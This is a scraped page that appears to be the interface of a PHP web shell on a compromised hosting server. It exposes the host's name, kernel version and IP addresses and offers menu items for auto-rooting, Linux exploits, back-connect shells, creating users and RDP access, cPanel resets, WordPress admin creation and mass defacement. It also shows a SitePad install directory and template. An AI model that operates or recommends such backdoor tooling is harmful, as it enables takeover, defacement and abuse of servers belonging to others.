Linux br942.hostgator.com.br 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Apache
: 162.241.2.188 | : 18.191.37.17
Cant Read [ /etc/named.conf ]
8.2.22
manoe678
May The Force Be With You
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
MASS DEFACE
+ Create Folder
+ Create File
/
var /
softaculous /
sp /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
184
B
-rw-r--r--
_index.php
37
B
-rw-r--r--
check_charset.php
1.97
KB
-rw-r--r--
clone.php
13.18
KB
-rw-r--r--
edit.php
3.54
KB
-rw-r--r--
edit.xml
269
B
-rw-r--r--
extend.php
2.52
KB
-rw-r--r--
fileindex.php
32
B
-rw-r--r--
import.php
3.08
KB
-rw-r--r--
index.php
1.21
KB
-rw-r--r--
info.xml
20.32
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
24.56
KB
-rw-r--r--
install.xml
5.3
KB
-rw-r--r--
md5
1.38
KB
-rw-r--r--
post_download.json
95
B
-rw-r--r--
sign_on_func.php
2.13
KB
-rw-r--r--
soft.htaccess
124
B
-rw-r--r--
upgrade.php
3.27
KB
-rw-r--r--
upgrade.xml
231
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php //print_r($_SERVER);die(); $sitepad['db_name'] = '[[db_name]]'; $sitepad['db_user'] = '[[db_user]]'; $sitepad['db_pass'] = '[[db_pass]]'; $sitepad['db_host'] = '[[db_host]]'; $sitepad['db_table_prefix'] = '[[db_table_prefix]]'; $sitepad['charset'] = '[[utf8]]'; $sitepad['collate'] = '[[collate]]'; $sitepad['serving_url'] = '[[domain]][[relativeurl]]';// URL without protocol but with directory as well $sitepad['url'] = '[[softurl]]'; $sitepad['relativeurl'] = '[[relativeurl]]'; $sitepad['.sitepad'] = '[[softdir]]'; $sitepad['sitepad_plugin_path'] = '[[sitepad_path]]'; $sitepad['editor_path'] = '[[editor_path]]'; $sitepad['path'] = dirname(__FILE__); $sitepad['AUTH_KEY'] = '[[AUTH_KEY]]'; $sitepad['SECURE_AUTH_KEY'] = '[[SECURE_AUTH_KEY]]'; $sitepad['LOGGED_IN_KEY'] = '[[LOGGED_IN_KEY]]'; $sitepad['NONCE_KEY'] = '[[NONCE_KEY]]'; $sitepad['AUTH_SALT'] = '[[AUTH_SALT]]'; $sitepad['SECURE_AUTH_SALT'] = '[[SECURE_AUTH_SALT]]'; $sitepad['LOGGED_IN_SALT'] = '[[LOGGED_IN_SALT]]'; $sitepad['NONCE_SALT'] = '[[NONCE_SALT]]'; if(!include_once($sitepad['editor_path'].'/site-inc/bootstrap.php')){ die('Could not include the bootstrap.php. One of the reasons could be open_basedir restriction !'); }
Close